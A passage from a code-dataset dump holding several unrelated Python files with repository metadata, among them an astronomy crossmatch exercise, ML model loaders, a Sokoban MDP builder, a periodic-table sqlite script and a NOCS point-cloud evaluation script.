model._remove_model_view(v)
def _attach_model_view(self, function):
self._model_views.append(function)
for inner in self._inner_models.values():
inner._attach_model_view(function)
def _remove_model_view(self, function):
self._model_views.remove(function)
for inner in self._inner_models.values():
inner._remove_model_view(function)
def _notify_model_views(self, events):
events = tuple(events)
for view in self._model_views:
view(self, events)
# The MIT License (MIT)
# Copyright (c) 2016 Ryan S. Morshead
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
| 32.632212 | 88 | 0.604936 | 1,666 | 13,575 | 4.80072 | 0.210084 | 0.015004 | 0.010503 | 0.005001 | 0.199425 | 0.16004 | 0.146537 | 0.098525 | 0.087022 | 0.076019 | 0 | 0.001385 | 0.308508 | 13,575 | 415 | 89 | 32.710843 | 0.850645 | 0.507993 | 0 | 0.147239 | 0 | 0 | 0.051467 | 0.004098 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147239 | false | 0.006135 | 0.042945 | 0 | 0.294479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d75d2890f7f5972e2fbf7529699f51b48bdb8b | 1,803 | py | Python | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | 8 | 2018-12-09T18:10:16.000Z | 2021-03-21T16:38:58.000Z | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | null | null | null | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | 5 | 2018-11-09T16:57:17.000Z | 2020-04-15T09:11:33.000Z | import numpy as np
import statistics
import time
from astropy.coordinates import SkyCoord
from astropy import units as u
def crossmatch(cat1, cat2, max_dist):
matches = []
nomatches = []
start = time.perf_counter()
skycat1 = SkyCoord(cat1*u.degree, frame='icrs')
skycat2 = SkyCoord(cat2*u.degree, frame='icrs')
closest_ids, closest_dists, closest_dists3d = skycat1.match_to_catalog_sky(skycat2)
closest_dists_deg = closest_dists.value
for cat1idx in range(len(cat1)):
if closest_dists_deg[cat1idx] > max_dist:
nomatches.append(cat1idx)
else:
matches.append((cat1idx,closest_ids[cat1idx],closest_dists_deg[cat1idx]))
#closest_dist.value returns an array of degrees
#print("vals", closest_ids)
#print("dists", closest_dists)
#print("dists.val", closest_dists.value)
return (matches, nomatches, time.perf_counter() - start)
# You can use this to test your function.
# Any code inside this `if` statement will be ignored by the automarker.
if __name__ == '__main__':
# The example in the question
cat1 = np.array([[180, 30], [45, 10], [300, -45]])
cat2 = np.array([[180, 32], [55, 10], [302, -44]])
matches, no_matches, time_taken = crossmatch(cat1, cat2, 5)
print('matches:', matches)
print('unmatched:', no_matches)
print('time taken:', time_taken)
# A function to create a random catalogue of size n
def create_cat(n):
ras = np.random.uniform(0, 360, size=(n, 1))
decs = np.random.uniform(-90, 90, size=(n, 1))
return np.hstack((ras, decs))
# Test your function on random inputs
np.random.seed(0)
cat1 = create_cat(10)
cat2 = create_cat(20)
matches, no_matches, time_taken = crossmatch(cat1, cat2, 5)
print('matches:', matches)
print('unmatched:', no_matches)
print('time taken:', time_taken)
| 31.086207 | 85 | 0.698835 | 262 | 1,803 | 4.652672 | 0.412214 | 0.068909 | 0.044299 | 0.026251 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0 | 0.046061 | 0.169163 | 1,803 | 57 | 86 | 31.631579 | 0.76769 | 0.20244 | 0 | 0.216216 | 0 | 0 | 0.051821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.135135 | 0 | 0.243243 | 0.162162 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d97ce2c5e214ea0d96fc151d9ce9c5473d5232 | 5,753 | py | Python | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | from typing import Set
from code_generator.line_buffer import LineBuffer, IndentedBlock
from code_generator.type_generators.cpp_array_alias import CppArrayAlias
from code_generator.type_generators.cpp_enum import CppEnum
from code_generator.type_generators.cpp_extended_variant_utils.from_json_generator import FromJsonWriter
from code_generator.type_generators.cpp_extended_variant_utils.to_json_generator import ToJsonWriter
from code_generator.type_generators.cpp_simple_alias import CppSimpleAlias
from code_generator.type_generators.cpp_type_base import CppTypeBase
from schema_parser.type_defs.array_alias import ArrayAlias
from schema_parser.type_defs.extended_variant import ExtendedVariant
from schema_parser.type_defs.ref_type import RefType
from schema_parser.type_defs.simple_alias import SimpleAlias
from schema_parser.type_defs.struct_type import StructType
from schema_parser.type_registry import TypeRegistry
class CppExtendedVariant(CppTypeBase):
type_def: ExtendedVariant
base_classes: Set[str]
member_methods: Set[str]
header_includes: Set[str]
cpp_includes: Set[str]
def __init__(self, type_def: ExtendedVariant):
super().__init__(type_def)
self.type_def = type_def
self.base_classes = set()
self.member_methods = set()
self.header_includes = {'variant'}
self.cpp_includes = {'nlohmann/json.hpp'}
def add_base_class(self, class_name):
self.base_classes.add(class_name)
def add_member_method(self, method_declaration):
self.member_methods.add(method_declaration)
def write_header(self, buffer: LineBuffer, type_registry: TypeRegistry) -> None:
# generate extended struct
if self.type_def.namespaces:
buffer.append('namespace ' + '::'.join(self.type_def.namespaces))
buffer.append('{')
buffer.indent_up()
if self.base_classes:
suffix = ' : ' + ', '.join(self.base_classes)
else:
suffix = ''
variant_members = ['std::monostate']
for member_type_def in self.type_def.content_variant.member_type_defs:
if isinstance(member_type_def, SimpleAlias):
cpp_alias = CppSimpleAlias(member_type_def)
variant_members.append(cpp_alias.actual_type())
elif isinstance(member_type_def, ArrayAlias):
cpp_array = CppArrayAlias(member_type_def)
variant_members.append(cpp_array.actual_type(type_registry))
elif isinstance(member_type_def, StructType):
# cpp_struct = CppStruct(member_type_def)
# variant_members.append(cpp_struct.type_def.type_name)
pass
elif isinstance(member_type_def, RefType):
# target_type = type_registry.get_ref_target(member_type_def.target_uri)
# variant_members.append(target_type.type_name)
pass
else:
raise TypeError(f"Unsupported struct member type: [{member_type_def}]")
buffer.append(f"struct {self.type_def.type_name}{suffix} : std::variant<{','.join(variant_members)}>")
buffer.append("{")
with IndentedBlock(buffer):
# write type enum
cpp_enum = CppEnum(self.type_def.type_enum)
cpp_enum.type_def.type_name = cpp_enum.type_def.type_name.capitalize()
cpp_enum.write_header(buffer, type_registry)
buffer.append('')
cast_expr = f'static_cast<{self.type_def.type_enum.underlying_type}>(MemberType)'
# write setter
buffer.append('template <Type MemberType, typename T>')
buffer.append(f'void SetAs(T value) ')
buffer.extend_last('{ ')
buffer.extend_last(f'emplace<{cast_expr}>(value);')
buffer.extend_last(' }')
buffer.new_line()
# write non-const getter
buffer.append('template <Type MemberType>')
buffer.append(f'[[nodiscard]] auto& GetAs() ')
buffer.extend_last('{ ')
buffer.extend_last(f'return std::get<{cast_expr}>(*this);')
buffer.extend_last(' }')
buffer.new_line()
# write const getter
buffer.append('template <Type MemberType>')
buffer.append(f'[[nodiscard]] auto const& GetAs() const ')
buffer.extend_last('{ ')
buffer.extend_last(f'return std::get<{cast_expr}>(*this);')
buffer.extend_last(' }')
# pre-defined methods
with IndentedBlock(buffer):
if self.member_methods:
for method in self.member_methods:
buffer.append(method)
buffer.append('};')
if self.type_def.namespaces:
buffer.indent_down()
buffer.append('} // namespace ' + '::'.join(self.type_def.namespaces))
def write_source(self, buffer: LineBuffer, type_registry: TypeRegistry):
if self.type_def.namespaces:
buffer.append('namespace ' + '::'.join(self.type_def.namespaces))
buffer.append('{')
buffer.indent_up()
# internal namespace
buffer.append(f"namespace internal")
buffer.append("{")
with IndentedBlock(buffer):
fjw = FromJsonWriter(buffer, type_registry, self.type_def)
fjw.write_function()
tjw = ToJsonWriter(buffer, type_registry, self.type_def)
tjw.write_function()
buffer.append("}")
buffer.new_line()
if self.type_def.namespaces:
buffer.indent_down()
buffer.append('} // namespace ' + '::'.join(self.type_def.namespaces))
| 42.301471 | 110 | 0.649226 | 654 | 5,753 | 5.425076 | 0.188073 | 0.063134 | 0.049605 | 0.047351 | 0.45885 | 0.359357 | 0.267475 | 0.213078 | 0.213078 | 0.182638 | 0 | 0 | 0.250652 | 5,753 | 135 | 111 | 42.614815 | 0.823011 | 0.06275 | 0 | 0.346154 | 0 | 0 | 0.115056 | 0.042007 | 0.009615 | 0 | 0 | 0 | 0 | 1 | 0.048077 | false | 0.019231 | 0.134615 | 0 | 0.240385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3dac29fab9b30a15f3567e16ce2def62510c239 | 5,959 | py | Python | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | 2 | 2021-08-23T21:56:07.000Z | 2022-01-20T13:52:19.000Z | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | null | null | null | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | null | null | null | import numpy as np
import os
from .file_loader import (
CatsvsdogsFileLoader,
FashionMnistFileLoader,
ImdbSentimentFileLoader,
StackoverflowFileLoader,
)
from .model_input import ModelInputGenerator
from .output_decoder import OutputDecoder
from .pipeline import Pipeline
from .preprocessing import pipeline_function_register
from abc import (
ABC,
abstractmethod,
)
from main.settings import (
DEBUG,
MODEL_ROOT,
)
from tensorflow import (
convert_to_tensor,
lite,
)
from tensorflow.keras.models import model_from_json
from typing import (
Generic,
TypeVar,
)
SELFCLASS = TypeVar('SELFCLASS')
class BaseModelLoader(ABC):
"""Metaclass for defining the model loader."""
def __new__(cls, model_dir: str, *args, **kwargs) -> Generic[SELFCLASS]:
return super(BaseModelLoader, cls).__new__(cls, *args, **kwargs)
def __init__(self, model_dir: str) -> None:
self.model_type = int(model_dir.split("/")[0])
self.model_dir = model_dir
self.model_preload()
self.preprocessing_load()
self.postprocessing_load()
self.model_input_load()
self.preload_file_loader()
def preprocessing_load(self) -> None:
"""Function to apply preprocessing to an array."""
preprocessing_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/preprocessing.json")
self.preprocessing = Pipeline()
self.preprocessing.from_json(preprocessing_path)
def postprocessing_load(self) -> None:
"""Function to apply postprocessing to model output."""
postprocessing_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/postprocessing.json")
self.postprocessing = OutputDecoder()
self.postprocessing.from_json(postprocessing_path)
def model_input_load(self) -> None:
"""Creates a generic modelinput."""
self.ModelInput = ModelInputGenerator()
def preload_file_loader(self) -> None:
"""Function to load the file as an array."""
if self.model_type == 1:
self.file_loader = FashionMnistFileLoader()
elif self.model_type == 2:
self.file_loader = ImdbSentimentFileLoader()
elif self.model_type == 3:
self.file_loader = StackoverflowFileLoader()
elif self.model_type == 4:
self.file_loader = CatsvsdogsFileLoader()
else:
pass
def generate_model_input(self, model_input: any) -> list:
"""From file -> array -> preprocessing -> model input."""
model_input = self.file_loader(model_input)
model_input = self.preprocessing(model_input)
model_input = self.ModelInput.model_input_generator(model_input)
return model_input
@abstractmethod
def model_preload(self) -> None:
"""This function is used to generate the preload of the model."""
pass
@abstractmethod
def predict(self, model_input: any, confidence: bool) -> dict:
"""With this function the inference of the model is generated."""
pass
class TFLiteModelLoader(BaseModelLoader):
"""Class to generate predictions from a TFLite model."""
NUM_THREADS = 4
def model_preload(self) -> None:
tflite_name = [name for name in os.listdir(MODEL_ROOT + f"{self.model_dir}") if name.endswith(".tflite")][0]
model_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/{tflite_name}")
if self.NUM_THREADS > 0:
self.interpreter = lite.Interpreter(
model_path=str(model_path), num_threads=self.NUM_THREADS)
else:
self.interpreter = lite.Interpreter(model_path=str(model_path))
self.interpreter.allocate_tensors()
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
# print(f"The model {self.model_dir.title()} has been successfully pre-loaded. (TFLITE)")
def predict(self, model_input: any, confidence: bool = False) -> dict:
model_input = self.generate_model_input(model_input)
if self.model_type in (1, 4):
for i, j in enumerate(model_input):
model_input_tensor = convert_to_tensor(
np.array(j), np.float32)
self.interpreter.set_tensor(
self.input_details[i]['index'], model_input_tensor)
elif self.model_type in (2, 3):
for i, j in enumerate(model_input):
self.interpreter.set_tensor(
self.input_details[i]['index'], j)
self.interpreter.invoke()
prediction = self.interpreter.get_tensor(
self.output_details[0]['index'])
result = self.postprocessing.output_decoding(
model_output=prediction, confidence=confidence)
return result
class HDF5JSONModelLoader(BaseModelLoader):
"""Class to generate predictions from a HDF5JSON model."""
def model_preload(self) -> None:
hdf5_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/model.hdf5")
json_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/model.json")
with open(json_path, "r") as jp:
self.model = model_from_json(jp.read())
self.model.load_weights(hdf5_path)
# print(f"The model {self.model_dir.title()} has been successfully pre-loaded. (HDF5-JSON)")
def predict(self, model_input: any, confidence: bool = False) -> dict:
model_input = self.generate_model_input(model_input)
prediction = self.model.predict(model_input)
result = self.postprocessing.output_decoding(
model_output=prediction, confidence=confidence)
return result
class CheckpointModelLoader(BaseModelLoader):
"""Class to generate predictions from a Checkpoint model."""
def model_preload(self) -> None:
pass
def predict(self, model_input: any, confidence: bool) -> dict:
pass
| 35.260355 | 116 | 0.664205 | 703 | 5,959 | 5.42532 | 0.197724 | 0.076036 | 0.031463 | 0.022024 | 0.375983 | 0.35763 | 0.303618 | 0.253802 | 0.253802 | 0.179339 | 0 | 0.004594 | 0.232925 | 5,959 | 168 | 117 | 35.470238 | 0.829797 | 0.119987 | 0 | 0.237705 | 0 | 0 | 0.039329 | 0.029882 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122951 | false | 0.040984 | 0.098361 | 0.008197 | 0.295082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3de0447e00cc0a2285e58663644fe3c006386e1 | 2,206 | py | Python | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | null | null | null | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | 1 | 2021-06-02T16:55:33.000Z | 2021-06-04T14:30:54.000Z | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | 2 | 2021-03-22T14:46:49.000Z | 2021-03-31T16:12:12.000Z | import os
from typing import Set
from . import MarkovDecisionProcedure
class Sokoban(MarkovDecisionProcedure):
def __init__(self, state_initial: Set[str], state_static: Set[str]):
# No discounting for Sokoban
discount_rate = 1.0
file_name = 'sokoban.lp'
super().__init__(state_initial, state_static, discount_rate, file_name)
class SokobanBuilder:
def __init__(self, level_name):
# All levels are stored in ./sokoban_levels/
path_to_level = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'sokoban_levels',
f'{level_name}.txt')
self.level_txt = ''
self.level_asp_initial = set()
self.level_asp_static = set()
self._level_from_textfile(path_to_level)
sample_mdp = self.build_mdp()
self.mdp_interface_file_path = sample_mdp.interface_file_path
self.mdp_problem_file_path = sample_mdp.problem_file_path
self.mdp_state_static = sample_mdp.state_static
def _level_from_textfile(self, path_to_level):
legend_dynamic = {
'$' : {'box({x},{y})'},
'*' : {'box({x},{y})'},
'@' : {'sokoban({x},{y})'}
}
legend_static = {
'#' : {'block({x},{y})'},
'.' : {'dest({x},{y})'},
'*' : {'dest({x},{y})'},
}
with open(path_to_level, 'r') as level_file:
for y, line in enumerate(level_file, start=1):
self.level_txt += line
for x, char in enumerate(line, start=1):
self.level_asp_initial |= { s.format(x=x, y=y) for s
in legend_dynamic.get(char, set()) }
self.level_asp_static |= { s.format(x=x, y=y) for s
in legend_static.get(char, set()) }
self.level_asp_static |= { f'col({x1})' for x1 in range(1, x+1) }
self.level_asp_static |= { f'row({y1})' for y1 in range(1, y+1) }
def build_mdp(self):
return Sokoban(state_initial=self.level_asp_initial, state_static=self.level_asp_static)
| 33.938462 | 96 | 0.550771 | 273 | 2,206 | 4.131868 | 0.260073 | 0.095745 | 0.085106 | 0.079787 | 0.139184 | 0.090426 | 0.090426 | 0.04078 | 0.04078 | 0.04078 | 0 | 0.007979 | 0.318223 | 2,206 | 64 | 97 | 34.46875 | 0.742021 | 0.031278 | 0 | 0 | 0 | 0 | 0.067948 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.068182 | 0.022727 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e045df8f99c15e93bf5205a4e184cde6cf770d | 1,014 | py | Python | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | 1 | 2021-08-05T10:37:26.000Z | 2021-08-05T10:37:26.000Z | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | null | null | null | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | null | null | null | import sqlite3
conn = sqlite3.connect('elements.db')
cur = conn.cursor()
cur.execute('DROP TABLE IF EXISTS elements')
cur.execute('CREATE TABLE elements (number INTEGER, atomic_weight FLOAT, element TEXT, symbol TEXT, mp FLOAT, bp FLOAT, density FLOAT, earth_crust FLOAT, discovered INTEGER, egroup INTEGER, ionization FLOAT)')
########
file = open('list.txt', 'r')
try:
elementsListFile = open('list.txt', 'r')
except:
print("File not found")
count = 0
totalLines = elementsListFile.readlines()
for line in totalLines:
count += 1
print("Line{}: {}".format(count, line.strip()))
data = line.split('\t')
for i in range(0, len(data), 12):
cur.execute('INSERT INTO elements (number, atomic_weight, element, symbol, mp, bp, density, earth_crust, discovered, egroup, ionization) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', (data[i], data[i+1], data[i+2], data[i+3], data[i+4], data[i+5],data[i+6] ,data[i+7], data[i+8], data[i+9], data[i+10]))
#endfor
#endfor
conn.commit()
| 30.727273 | 308 | 0.649901 | 146 | 1,014 | 4.486301 | 0.493151 | 0.083969 | 0.033588 | 0.036641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021127 | 0.159763 | 1,014 | 32 | 309 | 31.6875 | 0.747653 | 0.011834 | 0 | 0 | 0 | 0.105263 | 0.445565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e0a169cb3b631c48d93e3f6d0c870c92bbcab5 | 12,454 | py | Python | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 3 | 2021-06-20T17:46:32.000Z | 2021-12-17T16:55:00.000Z | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 1 | 2022-01-13T01:41:00.000Z | 2022-01-13T06:54:29.000Z | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 1 | 2021-09-14T06:17:55.000Z | 2021-09-14T06:17:55.000Z | import open3d as o3d
from open3d import *
import numpy as np
import sys, os
import matplotlib.pyplot as plt
import cv2
import torch
import glob
import copy
import mathutils
from PIL import Image
from pytorch3d.loss import chamfer_distance
from tk3dv.nocstools.aligning import estimateSimilarityUmeyama
import math
from tqdm import tqdm
from colorama import Fore, Back, Style
from matplotlib.gridspec import GridSpec
import json
sys.path.append('../')
sys.path.append(os.path.abspath(os.path.join('../models')))
sys.path.append(os.path.abspath(os.path.join('../Data_Loaders')))
sys.path.append(os.path.abspath(os.path.join('../Loss_Functions')))
from aadil_test import *
def quat2mat(x,y,z,w):
B = 0
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
n = w2 + x2 + y2 + z2
x = x / n
y = y / n
z = z / n
w = w / n
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.tensor([1 - 2*y2 - 2*z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, 1 - 2*x2 - 2*z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, 1 - 2*x2 - 2*y2]).reshape( 3, 3)
return rotMat
def read_json_file(path):
'''
Read json file
'''
with open(path) as fp:
json_data = json.load(fp)
return json_data
def pose_2_matrix(pose):
'''
Function to convert pose to transformation matrix
'''
flip_x = torch.eye(4)
flip_x[2, 2] *= -1
flip_x[1, 1] *= -1
views = pose.size(0)
rot_mat = inv_changed.quat2mat(pose[:, 3:]) # num_views 3 3
translation_mat = pose[:, :3].unsqueeze(-1) # num_views 3 1
transformation_mat = torch.cat([rot_mat, translation_mat], dim = 2)
transformation_mat = torch.cat([transformation_mat, torch.tensor([[0,0,0,1]]).unsqueeze(0).expand(1,1,4).type_as(transformation_mat).repeat(views, 1, 1)], dim=1)
flip_x = flip_x.inverse().type_as(transformation_mat)
# 180 degree rotation around x axis due to blender's coordinate system
return transformation_mat #@ flip_x
def pose_dict_to_numpy(pose):
'''
Convert pose dictionary to numpy array
'''
pose = np.array([pose['position']['x'],
pose['position']['y'],
pose['position']['z'],
pose['rotation']['x'],
pose['rotation']['y'],
pose['rotation']['z'],
pose['rotation']['w']
])
return pose
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
points = [
[0, 0, 0],
[1, 0, 0],
[0, 1, 0],
[1, 1, 0],
[0, 0, 1],
[1, 0, 1],
[0, 1, 1],
[1, 1, 1],
]
lines = [
[0, 1],
[0, 2],
[1, 3],
[2, 3],
[4, 5],
[4, 6],
[5, 7],
[6, 7],
[0, 4],
[1, 5],
[2, 6],
[3, 7],
]
colors = [[1, 0, 0] for i in range(len(lines))]
line_set = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(points),
lines=o3d.utility.Vector2iVector(lines),
)
o3d.visualization.draw_geometries([source_temp, target_temp])
def display_image(image):
cv2.imshow("image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def photometric_error(gt , pred):
mask = generate_mask_NOCS(gt)
difference = (gt - pred)
difference[:,:,0] *= mask
difference[:,:,1] *= mask
difference[:,:,2] *= mask
difference_squared = np.square(difference)
difference_root = np.sqrt(difference_squared)
return np.mean(difference_root)
def generate_mask_NOCS(nocs_map):
'''
Function to extract mask from NOCS map
'''
white = np.ones(nocs_map.shape)*1.0
white = np.array([1, 1, 1])
image_mask = np.abs(nocs_map[:,:,:3] - white).mean(axis=2) > 0.15
return image_mask
def read_image(nocs_image_path):
'''
Reading NOCS image
'''
nocs_map = cv2.imread(nocs_image_path)
nocs_map = cv2.cvtColor(nocs_map, cv2.COLOR_BGR2RGB) / 255.0
# print(nocs_map.shape)
return nocs_map
def visualize_nocs_map(nocs_map, nm, mask=None, image = None):
'''
Plots 3D point cloud from nocs map
Arguments:
nocs_map - [H x W x 3] - NOCS map for image
Returns:
None
'''
h, w = nocs_map.shape[:2]
nocs_mask = mask#generate_mask_NOCS(nm)
# print(np.unique(nocs_mask))
# display_image(nocs_mask / 255.0)
# plt.imshow(nocs_mask)
# plt.show()
nocs_mask_cloud = np.reshape(nocs_mask, (h*w))
# print(nocs_mask_cloud.shape)
nocs_cloud = np.reshape(nocs_map, (h*w, 3))
# nocs_cloud = np.reshape(nocs_map, (3, h*w))
nocs_cloud = nocs_cloud[nocs_mask_cloud == 1.0, :]
colors = nocs_cloud
if image is not None:
image_cloud = np.reshape(image, (h*w, 3))
image_cloud = image_cloud[nocs_mask_cloud == 1.0, :]
colors = image_cloud
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(nocs_cloud)
pcd.colors = o3d.utility.Vector3dVector(colors)
mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(
size=1.0, origin=[0, 0, 0])
return pcd
if __name__ == "__main__":
# Ground Truth NOCS files
# Cars
gt_nocs = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_NOXRayTL_00.png"))
gt_depth = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Depth_00.exr"))
gt_color = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Color_00.png"))
gt_mask = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_Mask_00.png"))
gt_pose = sorted(glob.glob("../../../../14102020/cars/ValSet/val/*/*/*_CameraPose.json"))
pred_nocs = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_nocs01.png"))
pred_depth = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_depth.tiff"))
pred_color = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_image.jpg"))
pred_mask = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_mask.jpg"))
pred_ply = sorted(glob.glob("/home/aadilmehdi/RRC/WSNOCS/14102020/cars/p1/pipeline1/*/*_point_cloud.ply"))
coss = []
# Camera Matrix
K = camera_matrix(888.88, 1000.0, 320, 240)
from tqdm import tqdm
for i in tqdm(range(len(gt_nocs))):
# Read the color image
image_view = cv2.imread(gt_color[i])
image_view = cv2.cvtColor(image_view, cv2.COLOR_BGR2RGB) / 255.0
image = cv2.resize(image_view, (640, 480))
# Read the depth image
depth = imageio.imread(gt_depth[i])[:, :, 0]
# Read the nocs image
nocs = read_image(gt_nocs[i])
# # Read the pose
# pose = read_json_file(gt_pose[i])
# print("Pose", pose)
# pose = torch.from_numpy(pose_dict_to_numpy(pose))
# print("Pose", pose)
# # pose = pose_2_matrix(pose)
# rot = quat2mat(pose[3],pose[4],pose[5],pose[6])
# print("Rot", rot)
# Get the mask
mask = generate_mask_NOCS(nocs)
# Get the depth point cloud
depth_point_cloud, depth_pcd = save_point_cloud(K, image, mask, depth, num=0, output_directory='./',depth_tiff=None)
